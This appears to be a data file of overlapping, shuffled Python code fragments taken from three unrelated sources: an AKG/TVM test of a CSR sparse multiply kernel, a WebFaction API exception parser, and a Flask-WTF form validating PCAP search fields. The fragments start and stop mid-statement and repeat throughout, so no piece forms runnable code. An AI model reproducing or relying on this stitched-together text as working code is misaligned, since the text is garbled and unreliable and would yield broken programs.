sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense,", "import target_profiling from akg.utils.format_transform import to_tvm_nd_array, get_shape from akg.utils.dsl_create import get_broadcast_shape def csr_mul(dense,", "atol=atol) print(\"Test {}\".format(\"Pass\" if res else \"Failed\")) target_name = attrs[\"target\"].split()[0] if not res:", "* ib.load(dense, [i, 0])) with ib.else_scope(): ib.store(output, pos, val * ib.load(dense, [i, col]))", "attrs: attrs = {\"target\": \"cuda\"} # gen data op_attrs = [shape2] dense, sparse_data,", "= get_broadcast_shape(dense_shape, sparse_shape) need_expand = tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim = tvm.const( len(dense_shape) ==", "import kernel_exec as utils from akg.utils.result_analysis import target_profiling from akg.utils.format_transform import to_tvm_nd_array, get_shape", "= get_rtol_atol(\"csr_mul\", dtype1) res = compare_tensor(output, expect, rtol=rtol, atol=atol) print(\"Test {}\".format(\"Pass\" if res", "weight must have the same dtype\" num_rows = row_idx.shape[0] - 1 dense_shape =", "= utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx, output), expect=expect) atol, rtol = get_rtol_atol(\"csr_mul\", dtype1)", "def test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False, attrs=None): if not attrs: attrs = {\"target\":", "outs: gen_ir(ins[0], ins[1], ins[2], ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def gen_data(shape1, shape2, dtype1,", "ib.load(sparse_data, pos) col = ib.load(col_idx, pos) with ib.if_scope(need_expand): ib.store(output, pos, val * ib.load(dense,", "output_name) return tvm.extern([shape], [dense, sparse_data, col_idx, row_idx], lambda ins, outs: gen_ir(ins[0], ins[1], ins[2],", "= np.zeros(output_shape, expect.dtype) output = utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx, output), expect=expect) atol,", "numpy as np import scipy.sparse import akg from akg import tvm from 
akg", "= ib.load(row_idx, i) end = ib.load(row_idx, i + 1) with ib.for_range(0, end -", "< broadcast_shape[0]) need_broadcast_last_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[1] < broadcast_shape[1]) def", "assert len(dense.shape) <= 2 assert dense.dtype == sparse_data.dtype, \"data and weight must have", "from tests.common.tensorio import compare_tensor from akg.utils import kernel_exec as utils from akg.utils.result_analysis import", "import akg from akg import tvm from akg import topi from tests.common.base import", "[dense, sparse_data, col_idx, row_idx], lambda ins, outs: gen_ir(ins[0], ins[1], ins[2], ins[3], outs[0]), dtype=sparse_data.dtype,", "shape2, dtype1, dtype2, poly_sch=False, attrs=None): if not attrs: attrs = {\"target\": \"cuda\"} #", "- 1 dense_shape = get_shape(dense.shape) sparse_shape = get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape) need_expand", "[i, 0])) with ib.else_scope(): ib.store(output, pos, val * ib.load(dense, [i, col])) return ib.get()", "= mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source()) raise AssertionError(\"Test fail\") if attrs[\"profiling\"]: args_list = to_tvm_nd_array(", "ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val * ib.load(dense, [i, 0])) with ib.else_scope(): ib.store(output, pos, val", "len(expect.shape) == 0: output_shape = (1, ) output = np.zeros(output_shape, expect.dtype) output =", "pos, val * ib.load(dense, [0, col])) with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val", "dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1) expect", "name=output_name) def gen_data(shape1, shape2, dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1],", "tvm from akg import 
topi from tests.common.base import get_rtol_atol from tests.common.gen_random import random_gaussian", "name='i') as i: start = ib.load(row_idx, i) end = ib.load(row_idx, i + 1)", "sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape)", "attrs[\"csr_avg_row\"] = sparse_data.shape[0] // shape1[0] mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1,", "dense, sparse_data, col_idx, row_idx, expect = gen_data(shape1, shape2, dtype1, dtype2) output_shape = expect.shape", "row_idx], lambda ins, outs: gen_ir(ins[0], ins[1], ins[2], ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def", "get_shape from akg.utils.dsl_create import get_broadcast_shape def csr_mul(dense, sparse_data, col_idx, row_idx, shape): assert len(shape)", "random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1) expect = sparse_data.multiply(np.broadcast_to(dense, shape2)) return", "assert dense.dtype == sparse_data.dtype, \"data and weight must have the same dtype\" num_rows", "= get_shape(dense.shape) sparse_shape = get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape) need_expand = tvm.const(len(dense_shape) <", "= ib.load(col_idx, pos) with ib.if_scope(need_expand): ib.store(output, pos, val * ib.load(dense, [col])) with ib.else_scope():", "ib.if_scope(need_expand): ib.store(output, pos, val * ib.load(dense, [col])) with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos,", "get_broadcast_shape def csr_mul(dense, sparse_data, col_idx, row_idx, shape): assert len(shape) == 2, \"only supports", "len(shape) == 2, \"only supports 2-dim sparse tensor\" assert len(dense.shape) <= 2 assert", "== 0: output_shape = (1, ) output = np.zeros(output_shape, 
expect.dtype) output = utils.mod_launch(mod,", "dense_shape = get_shape(dense.shape) sparse_shape = get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape) need_expand = tvm.const(len(dense_shape)", "attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape) == 0: output_shape = (1, ) output = np.zeros(output_shape,", "= mod if target_name != \"llvm\": mod_source = mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source()) raise", "with ib.if_scope(need_expand): ib.store(output, pos, val * ib.load(dense, [col])) with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output,", "else \"Failed\")) target_name = attrs[\"target\"].split()[0] if not res: mod_source = mod if target_name", "col_idx, row_idx, expect = gen_data(shape1, shape2, dtype1, dtype2) output_shape = expect.shape attrs[\"csr_avg_row\"] =", "as utils from akg.utils.result_analysis import target_profiling from akg.utils.format_transform import to_tvm_nd_array, get_shape from akg.utils.dsl_create", "ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val * ib.load(dense, [0, col])) with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output,", "poly_sch=False, attrs=None): if not attrs: attrs = {\"target\": \"cuda\"} # gen data op_attrs", "mod_source = mod if target_name != \"llvm\": mod_source = mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source())", "start + j with ib.if_scope(pos < end): val = ib.load(sparse_data, pos) col =", "col_idx, row_idx, output), expect=expect) atol, rtol = get_rtol_atol(\"csr_mul\", dtype1) res = compare_tensor(output, expect,", "gen_data(shape1, shape2, dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr',", "expect.dtype) output = utils.mod_launch(mod, (dense, sparse_data, col_idx, 
row_idx, output), expect=expect) atol, rtol =", "and dense_shape[1] < broadcast_shape[1]) def gen_ir(dense, sparse_data, col_idx, row_idx, output): ib = tvm.ir_builder.create()", "shape2, dtype1, dtype2) output_shape = expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0] // shape1[0] mod =", "csr_mul(dense, sparse_data, col_idx, row_idx, shape): assert len(shape) == 2, \"only supports 2-dim sparse", "output), expect=expect) atol, rtol = get_rtol_atol(\"csr_mul\", dtype1) res = compare_tensor(output, expect, rtol=rtol, atol=atol)", "dtype1, dtype2) output_shape = expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0] // shape1[0] mod = utils.op_build_test(csr_mul,", "expect, rtol=rtol, atol=atol) print(\"Test {}\".format(\"Pass\" if res else \"Failed\")) target_name = attrs[\"target\"].split()[0] if", "from akg import tvm from akg import topi from tests.common.base import get_rtol_atol from", "must have the same dtype\" num_rows = row_idx.shape[0] - 1 dense_shape = get_shape(dense.shape)", "start = ib.load(row_idx, i) end = ib.load(row_idx, i + 1) with ib.for_range(0, end", "if not attrs: attrs = {\"target\": \"cuda\"} # gen data op_attrs = [shape2]", "get_rtol_atol(\"csr_mul\", dtype1) res = compare_tensor(output, expect, rtol=rtol, atol=atol) print(\"Test {}\".format(\"Pass\" if res else", "args_list = to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx, output, expect], akg.tvm.context(target_name, 0)) target_profiling(mod, *args_list,", "akg from akg import tvm from akg import topi from tests.common.base import get_rtol_atol", "print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source()) raise AssertionError(\"Test fail\") if attrs[\"profiling\"]: args_list = to_tvm_nd_array( [dense, sparse_data," ]
[ "exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def _parse_exc_message(exc_message): if not exc_message: return", "return message[0] return None class WebFactionFault(Exception): def __init__(self, underlying): self.underlying_fault = underlying try:", "isinstance(message, list): if not message: return None return message[0] return None class WebFactionFault(Exception):", "def _parse_exc_type(exc_type): # This is horribly hacky, but there's not a particularly elegant", "underlying.faultString.split(':', 1) self.exception_type = _parse_exc_type(exc_type) self.exception_message = _parse_exc_message(exc_message) except ValueError: self.exception_type = None", "not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def _parse_exc_message(exc_message): if not exc_message:", "type to a string representing that # exception. if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None", "exception. 
if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX)", "exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def _parse_exc_message(exc_message): if not exc_message: return None message = ast.literal_eval(exc_message)", "__init__(self, underlying): self.underlying_fault = underlying try: exc_type, exc_message = underlying.faultString.split(':', 1) self.exception_type =", "= ast.literal_eval(exc_message) if isinstance(message, list): if not message: return None return message[0] return", "if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) *", "import ast EXCEPTION_TYPE_PREFIX = \"<class 'webfaction_api.exceptions.\" EXCEPTION_TYPE_SUFFIX = \"'>\" def _parse_exc_type(exc_type): # This", "EXCEPTION_TYPE_PREFIX = \"<class 'webfaction_api.exceptions.\" EXCEPTION_TYPE_SUFFIX = \"'>\" def _parse_exc_type(exc_type): # This is horribly", "a string representing that # exception. if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if not", "= underlying.faultString.split(':', 1) self.exception_type = _parse_exc_type(exc_type) self.exception_message = _parse_exc_message(exc_message) except ValueError: self.exception_type =", "message[0] return None class WebFactionFault(Exception): def __init__(self, underlying): self.underlying_fault = underlying try: exc_type,", "that # exception. 
if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None", "This is horribly hacky, but there's not a particularly elegant # way to", "= \"<class 'webfaction_api.exceptions.\" EXCEPTION_TYPE_SUFFIX = \"'>\" def _parse_exc_type(exc_type): # This is horribly hacky,", "-1] def _parse_exc_message(exc_message): if not exc_message: return None message = ast.literal_eval(exc_message) if isinstance(message,", "message = ast.literal_eval(exc_message) if isinstance(message, list): if not message: return None return message[0]", "exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def", "if not exc_message: return None message = ast.literal_eval(exc_message) if isinstance(message, list): if not", "None class WebFactionFault(Exception): def __init__(self, underlying): self.underlying_fault = underlying try: exc_type, exc_message =", "the exception type to a string representing that # exception. if not exc_type.startswith(EXCEPTION_TYPE_PREFIX):", "horribly hacky, but there's not a particularly elegant # way to go from", "\"<class 'webfaction_api.exceptions.\" EXCEPTION_TYPE_SUFFIX = \"'>\" def _parse_exc_type(exc_type): # This is horribly hacky, but", "try: exc_type, exc_message = underlying.faultString.split(':', 1) self.exception_type = _parse_exc_type(exc_type) self.exception_message = _parse_exc_message(exc_message) except", "to go from the exception type to a string representing that # exception.", "from the exception type to a string representing that # exception. if not", "hacky, but there's not a particularly elegant # way to go from the", "# exception. 
if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return", "exc_message: return None message = ast.literal_eval(exc_message) if isinstance(message, list): if not message: return", "not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1]", "self.exception_type = _parse_exc_type(exc_type) self.exception_message = _parse_exc_message(exc_message) except ValueError: self.exception_type = None self.exception_message =", "return None return message[0] return None class WebFactionFault(Exception): def __init__(self, underlying): self.underlying_fault =", "return None class WebFactionFault(Exception): def __init__(self, underlying): self.underlying_fault = underlying try: exc_type, exc_message", "_parse_exc_type(exc_type): # This is horribly hacky, but there's not a particularly elegant #", "particularly elegant # way to go from the exception type to a string", "_parse_exc_message(exc_message): if not exc_message: return None message = ast.literal_eval(exc_message) if isinstance(message, list): if", "if isinstance(message, list): if not message: return None return message[0] return None class", "= \"'>\" def _parse_exc_type(exc_type): # This is horribly hacky, but there's not a", "return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def _parse_exc_message(exc_message): if not exc_message: return None message =", "to a string representing that # exception. 
if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if", "is horribly hacky, but there's not a particularly elegant # way to go", "if not message: return None return message[0] return None class WebFactionFault(Exception): def __init__(self,", "EXCEPTION_TYPE_SUFFIX = \"'>\" def _parse_exc_type(exc_type): # This is horribly hacky, but there's not", "# This is horribly hacky, but there's not a particularly elegant # way", "def __init__(self, underlying): self.underlying_fault = underlying try: exc_type, exc_message = underlying.faultString.split(':', 1) self.exception_type", "a particularly elegant # way to go from the exception type to a", "but there's not a particularly elegant # way to go from the exception", "underlying): self.underlying_fault = underlying try: exc_type, exc_message = underlying.faultString.split(':', 1) self.exception_type = _parse_exc_type(exc_type)", "return None message = ast.literal_eval(exc_message) if isinstance(message, list): if not message: return None", "message: return None return message[0] return None class WebFactionFault(Exception): def __init__(self, underlying): self.underlying_fault", "representing that # exception. if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return", "not a particularly elegant # way to go from the exception type to", "def _parse_exc_message(exc_message): if not exc_message: return None message = ast.literal_eval(exc_message) if isinstance(message, list):", "class WebFactionFault(Exception): def __init__(self, underlying): self.underlying_fault = underlying try: exc_type, exc_message = underlying.faultString.split(':',", "return None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def _parse_exc_message(exc_message):", "exception type to a string representing that # exception. 
if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return", "if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def _parse_exc_message(exc_message): if not", "None message = ast.literal_eval(exc_message) if isinstance(message, list): if not message: return None return", "self.underlying_fault = underlying try: exc_type, exc_message = underlying.faultString.split(':', 1) self.exception_type = _parse_exc_type(exc_type) self.exception_message", "exc_type, exc_message = underlying.faultString.split(':', 1) self.exception_type = _parse_exc_type(exc_type) self.exception_message = _parse_exc_message(exc_message) except ValueError:", "None return message[0] return None class WebFactionFault(Exception): def __init__(self, underlying): self.underlying_fault = underlying", "not message: return None return message[0] return None class WebFactionFault(Exception): def __init__(self, underlying):", "elegant # way to go from the exception type to a string representing", "string representing that # exception. 
if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX):", "\"'>\" def _parse_exc_type(exc_type): # This is horribly hacky, but there's not a particularly", "there's not a particularly elegant # way to go from the exception type", "return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def _parse_exc_message(exc_message): if not exc_message: return None", "None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def _parse_exc_message(exc_message): if not exc_message: return None message", "ast EXCEPTION_TYPE_PREFIX = \"<class 'webfaction_api.exceptions.\" EXCEPTION_TYPE_SUFFIX = \"'>\" def _parse_exc_type(exc_type): # This is", "= _parse_exc_type(exc_type) self.exception_message = _parse_exc_message(exc_message) except ValueError: self.exception_type = None self.exception_message = None", "# way to go from the exception type to a string representing that", "exc_message = underlying.faultString.split(':', 1) self.exception_type = _parse_exc_type(exc_type) self.exception_message = _parse_exc_message(exc_message) except ValueError: self.exception_type", "WebFactionFault(Exception): def __init__(self, underlying): self.underlying_fault = underlying try: exc_type, exc_message = underlying.faultString.split(':', 1)", "None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def _parse_exc_message(exc_message): if", "1) self.exception_type = _parse_exc_type(exc_type) self.exception_message = _parse_exc_message(exc_message) except ValueError: self.exception_type = None self.exception_message", "not exc_message: return None message = ast.literal_eval(exc_message) if isinstance(message, list): if not message:", "* -1] def _parse_exc_message(exc_message): if not exc_message: return None message = ast.literal_eval(exc_message) if", "underlying try: exc_type, exc_message = 
underlying.faultString.split(':', 1) self.exception_type = _parse_exc_type(exc_type) self.exception_message = _parse_exc_message(exc_message)", "ast.literal_eval(exc_message) if isinstance(message, list): if not message: return None return message[0] return None", "= underlying try: exc_type, exc_message = underlying.faultString.split(':', 1) self.exception_type = _parse_exc_type(exc_type) self.exception_message =", "list): if not message: return None return message[0] return None class WebFactionFault(Exception): def", "'webfaction_api.exceptions.\" EXCEPTION_TYPE_SUFFIX = \"'>\" def _parse_exc_type(exc_type): # This is horribly hacky, but there's", "way to go from the exception type to a string representing that #", "go from the exception type to a string representing that # exception. if" ]
[ "validators=[InputRequired(message = \"The PCAP ID must only consist of numbers\")]) device_name = StringField('Device", "Session ID must only consist of numbers\")]) search_time = StringField('Search Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time,", "\"The PCAP ID must only consist of numbers\")]) device_name = StringField('Device Name',validators=[InputRequired(), Length(max=20)])", "session_id = IntegerField('Session ID', validators=[InputRequired(message = \"The Session ID must only consist of", "numbers\")]) search_time = StringField('Search Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time, message=\"The Search Time must have the", "search_time = StringField('Search Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time, message=\"The Search Time must have the format:", "Length(max=30), Regexp(valid_search_time, message=\"The Search Time must have the format: yyyy/mm/dd+hr:min:sec\")]) submit = SubmitField('Submit')", "IntegerField, SubmitField) from wtforms.validators import InputRequired, Length, Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The", "in the main-page with their corresponding validators class PcapForm(FlaskForm): pcap_id = IntegerField('PCAP ID',", "StringField('Device Name',validators=[InputRequired(), Length(max=20)]) session_id = IntegerField('Session ID', validators=[InputRequired(message = \"The Session ID must", "ID', validators=[InputRequired(message = \"The Session ID must only consist of numbers\")]) search_time =", "= \"The PCAP ID must only consist of numbers\")]) device_name = StringField('Device Name',validators=[InputRequired(),", "validators=[InputRequired(message = \"The Session ID must only consist of numbers\")]) search_time = StringField('Search", "their corresponding validators class PcapForm(FlaskForm): pcap_id = 
IntegerField('PCAP ID', validators=[InputRequired(message = \"The PCAP", "of numbers\")]) search_time = StringField('Search Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time, message=\"The Search Time must have", "ID must only consist of numbers\")]) device_name = StringField('Device Name',validators=[InputRequired(), Length(max=20)]) session_id =", "main-page with their corresponding validators class PcapForm(FlaskForm): pcap_id = IntegerField('PCAP ID', validators=[InputRequired(message =", "(StringField, IntegerField, SubmitField) from wtforms.validators import InputRequired, Length, Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" #", "from flask_wtf import FlaskForm from wtforms import (StringField, IntegerField, SubmitField) from wtforms.validators import", "class PcapForm(FlaskForm): pcap_id = IntegerField('PCAP ID', validators=[InputRequired(message = \"The PCAP ID must only", "Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time, message=\"The Search Time must have the format: yyyy/mm/dd+hr:min:sec\")]) submit =", "consist of numbers\")]) device_name = StringField('Device Name',validators=[InputRequired(), Length(max=20)]) session_id = IntegerField('Session ID', validators=[InputRequired(message", "wtforms import (StringField, IntegerField, SubmitField) from wtforms.validators import InputRequired, Length, Regexp valid_search_time =", "\"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The form rendered in the main-page with their corresponding validators class", "corresponding validators class PcapForm(FlaskForm): pcap_id = IntegerField('PCAP ID', validators=[InputRequired(message = \"The PCAP ID", "IntegerField('PCAP ID', validators=[InputRequired(message = \"The PCAP ID must only consist of 
numbers\")]) device_name", "= \"The Session ID must only consist of numbers\")]) search_time = StringField('Search Time',validators=[InputRequired(),", "flask_wtf import FlaskForm from wtforms import (StringField, IntegerField, SubmitField) from wtforms.validators import InputRequired,", "must only consist of numbers\")]) search_time = StringField('Search Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time, message=\"The Search", "StringField('Search Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time, message=\"The Search Time must have the format: yyyy/mm/dd+hr:min:sec\")]) submit", "Name',validators=[InputRequired(), Length(max=20)]) session_id = IntegerField('Session ID', validators=[InputRequired(message = \"The Session ID must only", "wtforms.validators import InputRequired, Length, Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The form rendered in", "FlaskForm from wtforms import (StringField, IntegerField, SubmitField) from wtforms.validators import InputRequired, Length, Regexp", "the main-page with their corresponding validators class PcapForm(FlaskForm): pcap_id = IntegerField('PCAP ID', validators=[InputRequired(message", "= IntegerField('PCAP ID', validators=[InputRequired(message = \"The PCAP ID must only consist of numbers\")])", "ID', validators=[InputRequired(message = \"The PCAP ID must only consist of numbers\")]) device_name =", "rendered in the main-page with their corresponding validators class PcapForm(FlaskForm): pcap_id = IntegerField('PCAP", "Length(max=20)]) session_id = IntegerField('Session ID', validators=[InputRequired(message = \"The Session ID must only consist", "import InputRequired, Length, Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The 
form rendered in the", "only consist of numbers\")]) search_time = StringField('Search Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time, message=\"The Search Time", "consist of numbers\")]) search_time = StringField('Search Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time, message=\"The Search Time must", "PcapForm(FlaskForm): pcap_id = IntegerField('PCAP ID', validators=[InputRequired(message = \"The PCAP ID must only consist", "InputRequired, Length, Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The form rendered in the main-page", "numbers\")]) device_name = StringField('Device Name',validators=[InputRequired(), Length(max=20)]) session_id = IntegerField('Session ID', validators=[InputRequired(message = \"The", "from wtforms.validators import InputRequired, Length, Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The form rendered", "= IntegerField('Session ID', validators=[InputRequired(message = \"The Session ID must only consist of numbers\")])", "with their corresponding validators class PcapForm(FlaskForm): pcap_id = IntegerField('PCAP ID', validators=[InputRequired(message = \"The", "SubmitField) from wtforms.validators import InputRequired, Length, Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The form", "IntegerField('Session ID', validators=[InputRequired(message = \"The Session ID must only consist of numbers\")]) search_time", "The form rendered in the main-page with their corresponding validators class PcapForm(FlaskForm): pcap_id", "ID must only consist of numbers\")]) search_time = StringField('Search Time',validators=[InputRequired(), 
Length(max=30), Regexp(valid_search_time, message=\"The", "= \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The form rendered in the main-page with their corresponding validators", "Length, Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The form rendered in the main-page with", "import FlaskForm from wtforms import (StringField, IntegerField, SubmitField) from wtforms.validators import InputRequired, Length,", "Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The form rendered in the main-page with their", "form rendered in the main-page with their corresponding validators class PcapForm(FlaskForm): pcap_id =", "pcap_id = IntegerField('PCAP ID', validators=[InputRequired(message = \"The PCAP ID must only consist of", "= StringField('Search Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time, message=\"The Search Time must have the format: yyyy/mm/dd+hr:min:sec\")])", "device_name = StringField('Device Name',validators=[InputRequired(), Length(max=20)]) session_id = IntegerField('Session ID', validators=[InputRequired(message = \"The Session", "must only consist of numbers\")]) device_name = StringField('Device Name',validators=[InputRequired(), Length(max=20)]) session_id = IntegerField('Session", "from wtforms import (StringField, IntegerField, SubmitField) from wtforms.validators import InputRequired, Length, Regexp valid_search_time", "of numbers\")]) device_name = StringField('Device Name',validators=[InputRequired(), Length(max=20)]) session_id = IntegerField('Session ID', validators=[InputRequired(message =", "only consist of numbers\")]) device_name = StringField('Device Name',validators=[InputRequired(), 
Length(max=20)]) session_id = IntegerField('Session ID',", "valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The form rendered in the main-page with their corresponding", "= StringField('Device Name',validators=[InputRequired(), Length(max=20)]) session_id = IntegerField('Session ID', validators=[InputRequired(message = \"The Session ID", "<filename>forms.py from flask_wtf import FlaskForm from wtforms import (StringField, IntegerField, SubmitField) from wtforms.validators", "import (StringField, IntegerField, SubmitField) from wtforms.validators import InputRequired, Length, Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\"", "\"The Session ID must only consist of numbers\")]) search_time = StringField('Search Time',validators=[InputRequired(), Length(max=30),", "# The form rendered in the main-page with their corresponding validators class PcapForm(FlaskForm):", "PCAP ID must only consist of numbers\")]) device_name = StringField('Device Name',validators=[InputRequired(), Length(max=20)]) session_id", "validators class PcapForm(FlaskForm): pcap_id = IntegerField('PCAP ID', validators=[InputRequired(message = \"The PCAP ID must" ]
